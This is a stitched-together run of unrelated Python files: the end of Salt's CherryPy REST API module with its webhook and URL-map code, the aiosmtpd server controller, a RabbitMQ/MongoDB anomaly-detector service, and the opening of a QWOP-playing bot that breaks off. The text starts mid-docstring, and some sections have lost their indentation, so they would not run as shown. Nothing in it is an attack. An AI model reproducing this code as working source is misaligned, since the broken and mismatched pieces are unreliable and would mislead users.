        **This is a generic interface and securing it is up to you!**

        This URL requires authentication however not all external services can
        be configured to authenticate. For this reason authentication can be
        selectively disabled for this URL. Follow best practices -- always use
        SSL, pass a secret key, configure the firewall to only allow traffic
        from a known source, etc.

    The event data is taken from the request body. The
    :mailheader:`Content-Type` header is respected for the payload.

    The event tag is prefixed with ``salt/netapi/hook`` and the URL path is
    appended to the end. For example, a ``POST`` request sent to
    ``/hook/mycompany/myapp/mydata`` will produce a Salt event with the tag
    ``salt/netapi/hook/mycompany/myapp/mydata``.

    .. seealso:: :ref:`events`, :ref:`reactor`
    '''
    exposed = True
    # Constant prefix for every event tag fired from this URL.
    tag_base = ['salt', 'netapi', 'hook']

    _cp_config = dict(LowDataAdapter._cp_config, **{
        # Don't do any lowdata processing on the POST data
        'tools.lowdata_fmt.on': True,

        # Auth can be overridden in __init__().
        'tools.salt_token.on': True,
        'tools.salt_auth.on': True,
    })

    def __init__(self):
        self.opts = cherrypy.config['saltopts']
        # listen=False: this endpoint only publishes, it never consumes.
        self.event = salt.utils.event.get_event(
                'master',
                sock_dir=self.opts['sock_dir'],
                transport=self.opts['transport'],
                opts=self.opts,
                listen=False)

        # NOTE(review): _cp_config here is the class-level dict, so disabling
        # auth mutates it for every Webhook instance — harmless while only one
        # instance is ever built; confirm before constructing more.
        if cherrypy.config['apiopts'].get('webhook_disable_auth'):
            self._cp_config['tools.salt_token.on'] = False
            self._cp_config['tools.salt_auth.on'] = False

    def POST(self, *args, **kwargs):
        '''
        Fire an event in Salt with a custom event tag and data

        .. http:post:: /hook

            :status 200: |200|
            :status 401: |401|
            :status 406: |406|
            :status 413: request body is too large

        **Example request:**

        .. code-block:: bash

            curl -sS localhost:8000/hook -d foo='Foo!' -d bar='Bar!'

        The resulting Salt event carries the request headers, the parsed POST
        body, and the raw request body, e.g.::

            Tag: salt/netapi/hook/mycompany/build/success
            Data:
            {'_stamp': '2014-02-14_17:40:11.440996',
             'headers': {'Content-Type': 'application/json', ...},
             'post': {'revision': 'aa22a3c4b2e7', 'result': True}}

        Salt's Reactor can then match on the tag (e.g.
        ``salt/netapi/hook/mycompany/build/*``) to kick off further work.
        '''
        # URL path segments after /hook become the tag suffix.
        tag = '/'.join(itertools.chain(self.tag_base, args))
        data = cherrypy.serving.request.unserialized_data
        raw_body = cherrypy.serving.request.raw_body
        headers = dict(cherrypy.request.headers)
        ret = self.event.fire_event({
            'body': raw_body,
            'post': data,
            'headers': headers,
        }, tag)
        return {'success': ret}
class Stats(object):
    '''
    Expose statistics on the running CherryPy server
    '''
    exposed = True

    _cp_config = dict(LowDataAdapter._cp_config, **{
        'tools.salt_token.on': True,
        'tools.salt_auth.on': True,
    })

    def GET(self):
        '''
        Return a dump of statistics collected from the CherryPy server

        .. http:get:: /stats

            :reqheader X-Auth-Token: |req_token|
            :reqheader Accept: |req_accept|

            :resheader Content-Type: |res_ct|

            :status 200: |200|
            :status 401: |401|
            :status 406: |406|
        '''
        # CherryPy's cpstats tool stashes its counters on the logging module;
        # if the tool was never enabled there is nothing to report.
        if not hasattr(logging, 'statistics'):
            return {}
        return cpstats.extrapolate_statistics(logging.statistics)
class App(object):
    '''
    Class to serve HTML5 apps
    '''
    exposed = True

    def GET(self, *args):
        '''
        Serve a single static file ignoring the remaining path

        This is useful in combination with a browser-based app using the HTML5
        history API.

        .. http::get:: /app

            :reqheader X-Auth-Token: |req_token|

            :status 200: |200|
            :status 401: |401|
        '''
        # Whatever sub-path was requested, always answer with the single
        # configured application entry point.
        return cherrypy.lib.static.serve_file(
            cherrypy.config['apiopts']['app'])
class API(object):
    '''
    Collect configuration and URL map for building the CherryPy app
    '''
    # Static URL -> resource-class mapping; dynamic entries are added by
    # _update_url_map().
    # NOTE(review): this is a class attribute that _update_url_map() mutates
    # in place, so config-derived entries leak across API() instances —
    # harmless while only one instance is ever built; confirm before reuse.
    url_map = {
        'index': LowDataAdapter,
        'login': Login,
        'logout': Logout,
        'minions': Minions,
        'run': Run,
        'jobs': Jobs,
        'keys': Keys,
        'events': Events,
        'stats': Stats,
    }

    def _setattr_url_map(self):
        '''
        Set an attribute on the local instance for each key/val in url_map

        CherryPy uses class attributes to resolve URLs.
        '''
        for url, cls in six.iteritems(self.url_map):
            setattr(self, url, cls())

    def _update_url_map(self):
        '''
        Assemble any dynamic or configurable URLs
        '''
        if HAS_WEBSOCKETS:
            self.url_map.update({
                'ws': WebsocketEndpoint,
            })

        # Allow the Webhook URL to be overridden from the conf.
        self.url_map.update({
            self.apiopts.get('webhook_url', 'hook').lstrip('/'): Webhook,
        })

        # Enable the single-page JS app URL.
        if 'app' in self.apiopts:
            self.url_map.update({
                self.apiopts.get('app_path', 'app').lstrip('/'): App,
            })

    def __init__(self):
        self.opts = cherrypy.config['saltopts']
        self.apiopts = cherrypy.config['apiopts']

        # Finalize the URL map before exposing it as instance attributes.
        self._update_url_map()
        self._setattr_url_map()

    def get_conf(self):
        '''
        Combine the CherryPy configuration with the rest_cherrypy config values
        pulled from the master config and return the CherryPy configuration
        '''
        conf = {
            'global': {
                'server.socket_host': self.apiopts.get('host', '0.0.0.0'),
                'server.socket_port': self.apiopts.get('port', 8000),
                'server.thread_pool': self.apiopts.get('thread_pool', 100),
                'server.socket_queue_size': self.apiopts.get('queue_size', 30),
                'engine.timeout_monitor.on': self.apiopts.get(
                    'expire_responses', True),
                'max_request_body_size': self.apiopts.get(
                    'max_request_body_size', 1048576),
                'debug': self.apiopts.get('debug', False),
            },
            '/': {
                'request.dispatch': cherrypy.dispatch.MethodDispatcher(),

                'tools.trailing_slash.on': True,
                'tools.gzip.on': True,

                'tools.cpstats.on': self.apiopts.get('collect_stats', False),

                'tools.html_override.on': True,
                'tools.cors_tool.on': True,
            },
        }

        if 'favicon' in self.apiopts:
            conf['/favicon.ico'] = {
                'tools.staticfile.on': True,
                'tools.staticfile.filename': self.apiopts['favicon'],
            }

        # Production mode silences CherryPy tracebacks unless debug is on.
        if self.apiopts.get('debug', False) is False:
            conf['global']['environment'] = 'production'

        # Serve static media if the directory has been set in the configuration
        if 'static' in self.apiopts:
            conf[self.apiopts.get('static_path', '/static')] = {
                'tools.staticdir.on': True,
                'tools.staticdir.dir': self.apiopts['static'],
            }

        # Add to global config
        cherrypy.config.update(conf['global'])

        return conf
def get_app(opts):
    '''
    Returns a WSGI app and a configuration dictionary

    :param opts: the Salt master configuration dictionary
    :return: tuple of (root CherryPy app object, rest_cherrypy opts,
        CherryPy configuration dict)
    '''
    apiopts = opts.get(__name__.rsplit('.', 2)[-2], {})  # rest_cherrypy opts

    # Add Salt and salt-api config options to the main CherryPy config dict.
    # This must happen before API() is constructed, since its __init__ reads
    # both keys back out of cherrypy.config.
    cherrypy.config['saltopts'] = opts
    cherrypy.config['apiopts'] = apiopts

    root = API()  # cherrypy app
    cpyopts = root.get_conf()  # cherrypy app opts

    return root, apiopts, cpyopts
|
controller.py | # Copyright 2014-2021 The aiosmtpd Developers
# SPDX-License-Identifier: Apache-2.0
import asyncio
import errno
import os
import ssl
import sys
import threading
import time
from abc import ABCMeta, abstractmethod
from contextlib import ExitStack
from pathlib import Path
from socket import AF_INET6, SOCK_STREAM, create_connection, has_ipv6
from socket import socket as makesock
from socket import timeout as socket_timeout
try:
from socket import AF_UNIX
except ImportError: # pragma: on-not-win32
AF_UNIX = None
from typing import Any, Coroutine, Dict, Optional, Union
if sys.version_info >= (3, 8):
from typing import Literal # pragma: py-lt-38
else: # pragma: py-ge-38
from typing_extensions import Literal
from warnings import warn
from public import public
from aiosmtpd.smtp import SMTP
# Convenience alias for the (private) server type returned by
# loop.create_server() / loop.create_unix_server().
AsyncServer = asyncio.base_events.Server

# Default number of seconds a threaded controller waits for the server to
# come up before raising TimeoutError.
DEFAULT_READY_TIMEOUT: float = 5.0
@public
class IP6_IS:
    # Apparently errno.E* constants adapts to the OS, so on Windows they will
    # automatically use the WSAE* constants

    # Errno values from a failed ::1 bind that mean IPv6 is NOT available.
    NO = {errno.EADDRNOTAVAIL, errno.EAFNOSUPPORT}
    # EADDRINUSE means the stack got far enough to attempt the bind, which
    # implies IPv6 IS supported.
    YES = {errno.EADDRINUSE}
def _has_ipv6() -> bool:
# Helper function to assist in mocking
return has_ipv6
@public
def get_localhost() -> Literal["::1", "127.0.0.1"]:
    """Returns numeric address to localhost depending on IPv6 availability"""
    # Ref:
    #  - https://github.com/urllib3/urllib3/pull/611#issuecomment-100954017
    #  - https://github.com/python/cpython/blob/ :
    #    - v3.6.13/Lib/test/support/__init__.py#L745-L758
    #    - v3.9.1/Lib/test/support/socket_helper.py#L124-L137
    if not _has_ipv6():
        # socket.has_ipv6 only tells us of current Python's IPv6 support, not the
        # system's. But if the current Python does not support IPv6, it's pointless to
        # explore further.
        return "127.0.0.1"
    try:
        with makesock(AF_INET6, SOCK_STREAM) as sock:
            sock.bind(("::1", 0))
        # If we reach this point, that means we can successfully bind ::1 (on random
        # unused port), so IPv6 is definitely supported
        return "::1"
    except OSError as e:
        # Classify the bind failure using the errno sets in IP6_IS.
        if e.errno in IP6_IS.NO:
            return "127.0.0.1"
        if e.errno in IP6_IS.YES:
            # We shouldn't ever get these errors, but if we do, that means IPv6 is
            # supported
            return "::1"
        # Other kinds of errors MUST be raised so we can inspect
        raise
class _FakeServer(asyncio.StreamReaderProtocol):
"""
Returned by _factory_invoker() in lieu of an SMTP instance in case
factory() failed to instantiate an SMTP instance.
"""
def __init__(self, loop: asyncio.AbstractEventLoop):
# Imitate what SMTP does
super().__init__(
asyncio.StreamReader(loop=loop),
client_connected_cb=self._client_connected_cb,
loop=loop,
)
def _client_connected_cb(
self, reader: asyncio.StreamReader, writer: asyncio.StreamWriter
) -> None:
pass
@public
class BaseController(metaclass=ABCMeta):
    """Common machinery for all controllers: holds the loop, the SMTP kwargs,
    and the factory plumbing that instantiates the SMTP protocol object."""

    # The SMTP instance created by factory(); None until first connection.
    smtpd = None
    # The bound asyncio server and the coroutine that created it.
    server: Optional[AsyncServer] = None
    server_coro: Optional[Coroutine] = None
    # Set once _factory_invoker() has run (successfully or not).
    _factory_invoked: threading.Event = None

    def __init__(
        self,
        handler: Any,
        loop: asyncio.AbstractEventLoop = None,
        *,
        ssl_context: Optional[ssl.SSLContext] = None,
        # SMTP parameters
        server_hostname: Optional[str] = None,
        **SMTP_parameters,
    ):
        """
        :param handler: the aiosmtpd handler object forwarded to SMTP
        :param loop: event loop to use; a new one is created if None
        :param ssl_context: SSL context for implicit TLS, if any
        :param server_hostname: forwarded to SMTP as ``hostname``
        :param SMTP_parameters: extra keyword arguments forwarded to SMTP
        """
        self.handler = handler
        if loop is None:
            self.loop = asyncio.new_event_loop()
        else:
            self.loop = loop
        self.ssl_context = ssl_context
        self.SMTP_kwargs: Dict[str, Any] = {}
        # Legacy "server_kwargs" dict is still honored but deprecated.
        if "server_kwargs" in SMTP_parameters:
            warn(
                "server_kwargs will be removed in version 2.0. "
                "Just specify the keyword arguments to forward to SMTP "
                "as kwargs to this __init__ method.",
                DeprecationWarning,
            )
            self.SMTP_kwargs = SMTP_parameters.pop("server_kwargs")
        self.SMTP_kwargs.update(SMTP_parameters)
        if server_hostname:
            self.SMTP_kwargs["hostname"] = server_hostname
        # Emulate previous behavior of defaulting enable_SMTPUTF8 to True
        # It actually conflicts with SMTP class's default, but the reasoning is
        # discussed in the docs.
        self.SMTP_kwargs.setdefault("enable_SMTPUTF8", True)
        #
        self._factory_invoked = threading.Event()

    def factory(self):
        """Subclasses can override this to customize the handler/server creation."""
        return SMTP(self.handler, **self.SMTP_kwargs)

    def _factory_invoker(self) -> Union[SMTP, _FakeServer]:
        """Wraps factory() to catch exceptions during instantiation"""
        try:
            self.smtpd = self.factory()
            if self.smtpd is None:
                raise RuntimeError("factory() returned None")
            return self.smtpd
        except Exception as err:
            # Stash the error so start() can re-raise it on the main thread,
            # and hand asyncio a harmless stand-in protocol instead.
            self._thread_exception = err
            return _FakeServer(self.loop)
        finally:
            self._factory_invoked.set()

    @abstractmethod
    def _create_server(self) -> Coroutine:
        """
        Overridden by subclasses to actually perform the async binding to the
        listener endpoint. When overridden, MUST refer the _factory_invoker() method.
        """
        raise NotImplementedError

    def _cleanup(self):
        """Reset internal variables to prevent contamination"""
        self._thread_exception = None
        self._factory_invoked.clear()
        self.server_coro = None
        self.server = None
        self.smtpd = None

    def cancel_tasks(self, stop_loop: bool = True):
        """
        Convenience method to stop the loop and cancel all tasks.
        Use loop.call_soon_threadsafe() to invoke this.
        """
        if stop_loop:  # pragma: nobranch
            self.loop.stop()
        try:
            # asyncio.all_tasks moved out of Task in newer Pythons.
            _all_tasks = asyncio.all_tasks  # pytype: disable=module-attr
        except AttributeError:  # pragma: py-gt-36
            _all_tasks = asyncio.Task.all_tasks
        for task in _all_tasks(self.loop):
            # This needs to be invoked in a thread-safe way
            task.cancel()
@public
class BaseThreadedController(BaseController, metaclass=ABCMeta):
    """Runs the event loop in a daemon thread; start()/stop() manage it."""

    # Background thread running the loop, and any exception raised inside it
    # (inspected by start()).
    _thread: Optional[threading.Thread] = None
    _thread_exception: Optional[Exception] = None

    def __init__(
        self,
        handler: Any,
        loop: asyncio.AbstractEventLoop = None,
        *,
        ready_timeout: float = DEFAULT_READY_TIMEOUT,
        ssl_context: Optional[ssl.SSLContext] = None,
        # SMTP parameters
        server_hostname: Optional[str] = None,
        **SMTP_parameters,
    ):
        """
        :param ready_timeout: seconds start() waits for the server to come up;
            overridden by the AIOSMTPD_CONTROLLER_TIMEOUT env var if set
        """
        super().__init__(
            handler,
            loop,
            ssl_context=ssl_context,
            server_hostname=server_hostname,
            **SMTP_parameters,
        )
        # Environment variable takes precedence over the argument.
        self.ready_timeout = float(
            os.getenv("AIOSMTPD_CONTROLLER_TIMEOUT", ready_timeout)
        )

    @abstractmethod
    def _trigger_server(self):
        """
        Overridden by subclasses to trigger asyncio to actually initialize the SMTP
        class (it's lazy initialization, done only on initial connection).
        """
        raise NotImplementedError

    def _run(self, ready_event: threading.Event) -> None:
        # Thread target: owns the event loop for the server's lifetime.
        asyncio.set_event_loop(self.loop)
        try:
            # Need to do two-step assignments here to ensure IDEs can properly
            # detect the types of the vars. Cannot use `assert isinstance`, because
            # Python 3.6 in asyncio debug mode has a bug wherein CoroWrapper is not
            # an instance of Coroutine
            self.server_coro = self._create_server()
            srv: AsyncServer = self.loop.run_until_complete(self.server_coro)
            self.server = srv
        except Exception as error:  # pragma: on-wsl
            # Usually will enter this part only if create_server() cannot bind to the
            # specified host:port.
            #
            # Somehow WSL 1.0 (Windows Subsystem for Linux) allows multiple
            # listeners on one port?!
            # That is why we add "pragma: on-wsl" there, so this block will not affect
            # coverage on WSL 1.0.
            self._thread_exception = error
            return
        self.loop.call_soon(ready_event.set)
        self.loop.run_forever()
        # We reach this point when loop is ended (by external code)
        # Perform some stoppages to ensure endpoint no longer bound.
        self.server.close()
        self.loop.run_until_complete(self.server.wait_closed())
        self.loop.close()
        self.server = None

    def start(self):
        """
        Start a thread and run the asyncio event loop in that thread
        """
        assert self._thread is None, "SMTP daemon already running"
        self._factory_invoked.clear()

        ready_event = threading.Event()
        self._thread = threading.Thread(target=self._run, args=(ready_event,))
        self._thread.daemon = True
        self._thread.start()
        # Wait a while until the server is responding.
        start = time.monotonic()
        if not ready_event.wait(self.ready_timeout):
            # An exception within self._run will also result in ready_event not set
            # So, we first test for that, before raising TimeoutError
            if self._thread_exception is not None:  # pragma: on-wsl
                # See comment about WSL1.0 in the _run() method
                raise self._thread_exception
            else:
                raise TimeoutError(
                    "SMTP server failed to start within allotted time. "
                    "This might happen if the system is too busy. "
                    "Try increasing the `ready_timeout` parameter."
                )
        respond_timeout = self.ready_timeout - (time.monotonic() - start)

        # Apparently create_server invokes factory() "lazily", so exceptions in
        # factory() go undetected. To trigger factory() invocation we need to open
        # a connection to the server and 'exchange' some traffic.
        try:
            self._trigger_server()
        except socket_timeout:
            # We totally don't care of timeout experienced by _testconn,
            pass
        except Exception:
            # Raise other exceptions though
            raise
        if not self._factory_invoked.wait(respond_timeout):
            raise TimeoutError(
                "SMTP server started, but not responding within allotted time. "
                "This might happen if the system is too busy. "
                "Try increasing the `ready_timeout` parameter."
            )
        if self._thread_exception is not None:
            raise self._thread_exception

        # Defensive
        if self.smtpd is None:
            raise RuntimeError("Unknown Error, failed to init SMTP server")

    def stop(self, no_assert: bool = False):
        """
        Stop the loop, the tasks in the loop, and terminate the thread as well.
        """
        assert no_assert or self._thread is not None, "SMTP daemon not running"
        self.loop.call_soon_threadsafe(self.cancel_tasks)
        if self._thread is not None:
            self._thread.join()
            self._thread = None
        self._cleanup()
@public
class BaseUnthreadedController(BaseController, metaclass=ABCMeta):
    """Controller variant that leaves running the event loop to the caller."""

    def __init__(
        self,
        handler: Any,
        loop: asyncio.AbstractEventLoop = None,
        *,
        ssl_context: Optional[ssl.SSLContext] = None,
        # SMTP parameters
        server_hostname: Optional[str] = None,
        **SMTP_parameters,
    ):
        super().__init__(
            handler,
            loop,
            ssl_context=ssl_context,
            server_hostname=server_hostname,
            **SMTP_parameters,
        )
        # Signaled by finalize() once teardown has completed.
        self.ended = threading.Event()

    def begin(self):
        """
        Sets up the asyncio server task and inject it into the asyncio event loop.
        Does NOT actually start the event loop itself.
        """
        asyncio.set_event_loop(self.loop)
        # Need to do two-step assignments here to ensure IDEs can properly
        # detect the types of the vars. Cannot use `assert isinstance`, because
        # Python 3.6 in asyncio debug mode has a bug wherein CoroWrapper is not
        # an instance of Coroutine
        self.server_coro = self._create_server()
        srv: AsyncServer = self.loop.run_until_complete(self.server_coro)
        self.server = srv

    async def finalize(self):
        """
        Perform orderly closing of the server listener.
        NOTE: This is an async method; await this from an async or use
        loop.create_task() (if loop is still running), or
        loop.run_until_complete() (if loop has stopped)
        """
        self.ended.clear()
        server = self.server
        server.close()
        await server.wait_closed()
        self.server_coro.close()
        self._cleanup()
        self.ended.set()

    def end(self):
        """
        Convenience method to asynchronously invoke finalize().
        Consider using loop.call_soon_threadsafe to invoke this method, especially
        if your loop is running in a different thread. You can afterwards .wait() on
        ended attribute (a threading.Event) to check for completion, if needed.
        """
        self.ended.clear()
        if self.loop.is_running():
            self.loop.create_task(self.finalize())
        else:
            self.loop.run_until_complete(self.finalize())
@public
class InetMixin(BaseController, metaclass=ABCMeta):
    """Mixin providing INET (host:port) binding and connection triggering."""

    def __init__(
        self,
        handler: Any,
        hostname: Optional[str] = None,
        port: int = 8025,
        loop: asyncio.AbstractEventLoop = None,
        **kwargs,
    ):
        """
        :param hostname: host to bind; defaults to the numeric localhost
            address chosen by get_localhost()
        :param port: TCP port to bind (default 8025)
        """
        super().__init__(
            handler,
            loop,
            **kwargs,
        )
        self._localhost = get_localhost()
        self.hostname = self._localhost if hostname is None else hostname
        self.port = port

    def _create_server(self) -> Coroutine:
        """
        Creates a 'server task' that listens on an INET host:port.
        Does NOT actually start the protocol object itself;
        _factory_invoker() is only called upon first connection attempt.
        """
        return self.loop.create_server(
            self._factory_invoker,
            host=self.hostname,
            port=self.port,
            ssl=self.ssl_context,
        )

    def _trigger_server(self):
        """
        Opens a socket connection to the newly launched server, wrapping in an SSL
        Context if necessary, and read some data from it to ensure that factory()
        gets invoked.
        """
        # At this point, if self.hostname is Falsy, it most likely is "" (bind to all
        # addresses). In such case, it should be safe to connect to localhost)
        hostname = self.hostname or self._localhost
        with ExitStack() as stk:
            s = stk.enter_context(create_connection((hostname, self.port), 1.0))
            if self.ssl_context:
                s = stk.enter_context(self.ssl_context.wrap_socket(s))
            s.recv(1024)
@public
class UnixSocketMixin(BaseController, metaclass=ABCMeta):  # pragma: no-unixsock
    """Mixin providing Unix-socket binding and connection triggering."""

    def __init__(
        self,
        handler: Any,
        unix_socket: Union[str, Path],
        loop: asyncio.AbstractEventLoop = None,
        **kwargs,
    ):
        """
        :param unix_socket: filesystem path of the Unix socket to listen on
        """
        super().__init__(
            handler,
            loop,
            **kwargs,
        )
        self.unix_socket = str(unix_socket)

    def _create_server(self) -> Coroutine:
        """
        Creates a 'server task' that listens on a Unix Socket file.
        Does NOT actually start the protocol object itself;
        _factory_invoker() is only called upon first connection attempt.
        """
        return self.loop.create_unix_server(
            self._factory_invoker,
            path=self.unix_socket,
            ssl=self.ssl_context,
        )

    def _trigger_server(self):
        """
        Opens a socket connection to the newly launched server, wrapping in an SSL
        Context if necessary, and read some data from it to ensure that factory()
        gets invoked.
        """
        with ExitStack() as stk:
            s: makesock = stk.enter_context(makesock(AF_UNIX, SOCK_STREAM))
            s.connect(self.unix_socket)
            if self.ssl_context:
                s = stk.enter_context(self.ssl_context.wrap_socket(s))
            s.recv(1024)
@public
class Controller(InetMixin, BaseThreadedController):
    """Provides a multithreaded controller that listens on an INET endpoint"""

    def _trigger_server(self):
        # Explicitly name InetMixin instead of relying on the MRO so there is
        # no ambiguity about which parent's _trigger_server() runs.
        # (Prevent confusion on which _trigger_server() to invoke --
        # or so LGTM.com claimed.)
        InetMixin._trigger_server(self)
@public
class UnixSocketController(  # pragma: no-unixsock
    UnixSocketMixin, BaseThreadedController
):
    """Provides a multithreaded controller that listens on a Unix Socket file"""

    def _trigger_server(self):  # pragma: no-unixsock
        # Explicitly name UnixSocketMixin instead of relying on the MRO so
        # there is no ambiguity about which parent's _trigger_server() runs.
        # (Prevent confusion on which _trigger_server() to invoke --
        # or so LGTM.com claimed.)
        UnixSocketMixin._trigger_server(self)
@public
class UnthreadedController(InetMixin, BaseUnthreadedController):
    """Provides an unthreaded controller that listens on an INET endpoint.

    All behaviour is inherited; the docstring alone is a sufficient body.
    """
@public
class UnixSocketUnthreadedController(  # pragma: no-unixsock
    UnixSocketMixin, BaseUnthreadedController
):
    """Provides an unthreaded controller that listens on a Unix Socket file.

    All behaviour is inherited; the docstring alone is a sufficient body.
    """
|
main.py | #
# Copyright 2020, Fernando Lemes da Silva
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import sys
import logging
import time
import threading
import pika
import json
import uuid
from pymongo import MongoClient
from AnomalyDetector import AnomalyDetector
import redis
from flask import Flask
from prometheus_flask_exporter import PrometheusMetrics
# Route INFO-and-above from the root logger to stdout with timestamps.
logger = logging.getLogger()
logger.setLevel(logging.INFO)
stdout_handler = logging.StreamHandler(sys.stdout)
stdout_handler.setLevel(logging.INFO)
log_format = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
stdout_handler.setFormatter(log_format)
logger.addHandler(stdout_handler)
# Redis endpoint, overridable via environment variables.
redis_host = os.environ.get('REDIS_HOST', 'localhost')
redis_port = os.environ.get('REDIS_PORT', '6379')
logger.info('Using Redis at: %s:%s', redis_host, redis_port)
# Mandatory: MongoDB connection URL.
mongo_url = os.environ.get('MONGO_URL')
if mongo_url is None:
    logger.fatal('Missing MONGO_URL environment variable.')
    # Exit non-zero so orchestrators detect the misconfiguration
    # (the original sys.exit() reported success).
    sys.exit(1)
logger.info('Using mongo URL: %s', mongo_url)
# Optional Mongo database/collection names, with sensible defaults.
mongo_database = os.environ.get('MONGO_DATABASE', 'kubeowl')
logger.info('Using mongo database: %s', mongo_database)
mongo_http_records = os.environ.get('MONGO_HTTP_RECORDS', 'http_records')
logger.info('HTTP records collection is: %s', mongo_http_records)
mongo_anomalies = os.environ.get('MONGO_ANOMALIES', 'anomalies')
logger.info('Anomalies collection is: %s', mongo_anomalies)
mongo_samples = os.environ.get('MONGO_SAMPLES', 'samples')
logger.info('Samples collection is: %s', mongo_samples)
# Mandatory: RabbitMQ host.
rabbitmq_host = os.environ.get('RABBITMQ_HOST')
if rabbitmq_host is None:
    logger.fatal('Missing RABBITMQ_HOST environment variable.')
    sys.exit(1)
logger.info('Using RabbitMQ host: %s', rabbitmq_host)
# Optional RabbitMQ exchange/queue names.
rabbitmq_exchange = os.environ.get('RABBITMQ_EXCHANGE', 'http_enriched_records')
logger.info('RabbitMQ exchange: %s', rabbitmq_exchange)
rabbitmq_queue = os.environ.get('RABBITMQ_QUEUE', 'evaluate_response_time')
logger.info('RabbitMQ queue: %s', rabbitmq_queue)
# Shared state: flipped by the worker threads, read by /healthcheck.
service_ok = False
# Records evaluated since the last minutely report (see run_report_records_processed).
records_processed = 0
flask_app = Flask(__name__)
metrics = PrometheusMetrics(flask_app)
# Prometheus gauges for total and anomalous record counts.
counter = metrics.info('evaluated_records', 'Number of evaluated records')
counter.set(0)
anomaly_counter = metrics.info('abnormal_records', 'Number of abnormal records')
anomaly_counter.set(0)
@flask_app.route('/healthcheck')
@metrics.do_not_track()
def healthcheck():
    """Liveness endpoint: 200 while the worker threads are healthy, else 400."""
    return ('OK', 200) if service_ok else ('NOK', 400)
anomaly_detector = AnomalyDetector()
# Create indexes up front so the queries issued by the worker threads are fast.
client = MongoClient(mongo_url)
database = client[mongo_database]
# Fixed variable-name typo: "http_recors_collection" -> "http_records_collection"
# (matching the spelling used inside run_trainer).
http_records_collection = database[mongo_http_records]
http_records_collection.create_index([("aggregate_id", 1)])
http_records_collection.create_index([("aggregate_id", 1), ("random", 1)])
http_records_collection.create_index([("aggregate_id", 1), ("timestamp", 1)])
anomalies_collection = database[mongo_anomalies]
anomalies_collection.create_index([("aggregate_id", 1)])
anomalies_collection.create_index([("aggregate_id", 1), ("timestamp", 1)])
samples_collection = database[mongo_samples]
samples_collection.create_index([("aggregate_id", 1)])
def run_trainer():
    """Background thread: (re)train the anomaly detector every hour.

    Reconnects to MongoDB/Redis and retries 15s after any failure, flipping
    the global ``service_ok`` flag consumed by the /healthcheck endpoint.
    """
    global service_ok
    while True:
        try:
            client = MongoClient(mongo_url)
            database = client[mongo_database]
            http_records_collection = database[mongo_http_records]
            anomalies_collection = database[mongo_anomalies]
            samples_collection = database[mongo_samples]
            redis_client = redis.Redis(host=redis_host, port=int(redis_port), db=0)
            service_ok = True
            while True:
                anomaly_detector.training_thread(http_records_collection, anomalies_collection, samples_collection, redis_client)
                time.sleep(3600)
        except Exception:
            # Narrowed from a bare "except:" so SystemExit/KeyboardInterrupt
            # are not swallowed by the retry loop.
            service_ok = False
            logger.exception("Failure at training thread.")
            time.sleep(15)
def evaluate_message(anomalies_collection, redis_client, data):
    """Score one enriched HTTP record; persist it when flagged as anomalous."""
    global counter, records_processed
    flagged = anomaly_detector.is_anomalous(redis_client, data)
    if flagged:
        anomaly_counter.inc()
        # Give the stored anomaly its own id and tag its origin.
        data['_id'] = str(uuid.uuid4())
        data['anomaly'] = 'anomaly-detector'
        anomalies_collection.insert_one(data)
    counter.inc()
    records_processed += 1
def run_queue_listener():
    """Background thread: consume enriched HTTP records from RabbitMQ forever.

    Retries the RabbitMQ connection until it succeeds, then consumes messages
    and evaluates each one; on any failure it flips ``service_ok`` off, waits
    15s and starts over.
    """
    global service_ok
    while True:
        connected = False
        while not connected:
            try:
                connection = pika.BlockingConnection(pika.ConnectionParameters(rabbitmq_host))
                channel = connection.channel()
                channel.queue_declare(queue = rabbitmq_queue, exclusive = False)
                channel.queue_bind(exchange = rabbitmq_exchange, queue = rabbitmq_queue)
                connected = True
            except (pika.exceptions.AMQPConnectionError, pika.exceptions.ChannelClosedByBroker):
                logger.info('Waiting before retrying RabbitMQ connection...')
                time.sleep(15)
        try:
            client = MongoClient(mongo_url)
            database = client[mongo_database]
            anomalies_collection = database[mongo_anomalies]
            redis_client = redis.Redis(host=redis_host, port=int(redis_port), db=0)

            def callback(channel, method, properties, body):
                # auto_ack=True below: a crash here loses at most this message.
                data = json.loads(body)
                evaluate_message(anomalies_collection, redis_client, data)

            channel.basic_consume(queue=rabbitmq_queue, on_message_callback=callback, auto_ack=True)
            service_ok = True
            channel.start_consuming()
        except Exception:
            # Narrowed from a bare "except:" so SystemExit/KeyboardInterrupt
            # are not swallowed; everything else is logged and retried.
            service_ok = False
            logger.exception("Failure evaluating records.")
            time.sleep(15)
def run_report_records_processed():
    """Background thread: log once a minute how many records were evaluated."""
    global records_processed
    while True:
        evaluated = records_processed
        if evaluated > 0:
            # Subtract (rather than reset to zero) so increments made by the
            # consumer thread between the read and the write are not lost.
            records_processed -= evaluated
            logger.info("%d records evaluated during last minute.", evaluated)
        time.sleep(60)
if __name__ == "__main__":
try:
training_thread = threading.Thread(target=run_trainer)
training_thread.start()
report_records_processed_thread = threading.Thread(target=run_report_records_processed)
report_records_processed_thread.start()
queue_listener_thread=threading.Thread(target=run_queue_listener)
queue_listener_thread.start()
flask_app.run(host='0.0.0.0', port=80)
except (IOError, SystemExit):
raise
except KeyboardInterrupt:
logger.info("Shutting down.")
|
autoqwopper.py | import ImageGrab
import Image
import os
import time
from random import *
import win32api, win32con
import threading
from pytesser import *
from deap import base
from deap import creator
from deap import tools
import numpy
import math
import pickle
import sys
# Globals
# NOTE(review): opened 'w+' and never closed; the handle stays open for the
# life of the process and is reused by updateStatistics().
LB_FILE = open('../logbook.pickle', 'w+')
# DEAP stuff
IND_SIZE = 5 #number of key presses
POP_SIZE = 1 #number of individuals
T_SIZE = 3 #tournament size
generations = 1000 #number of generations
selb = 1 #how many individuals to select when you call toolbox.selectBest
selw = 5 #how many individuals to select when you call toolbox.selectWorst
# QWOP stuff
# Bounding box for QWOP (screen coordinates; assumes the game window is at a
# fixed position -- adjust start_x/start_y if the browser is moved)
start_x, start_y = 9, 105
end_x, end_y = 640 + start_x, 400 + start_y
frame = (start_x, start_y, end_x, end_y)
# Bounding box for the "metres" dialogue box (relative to `frame`)
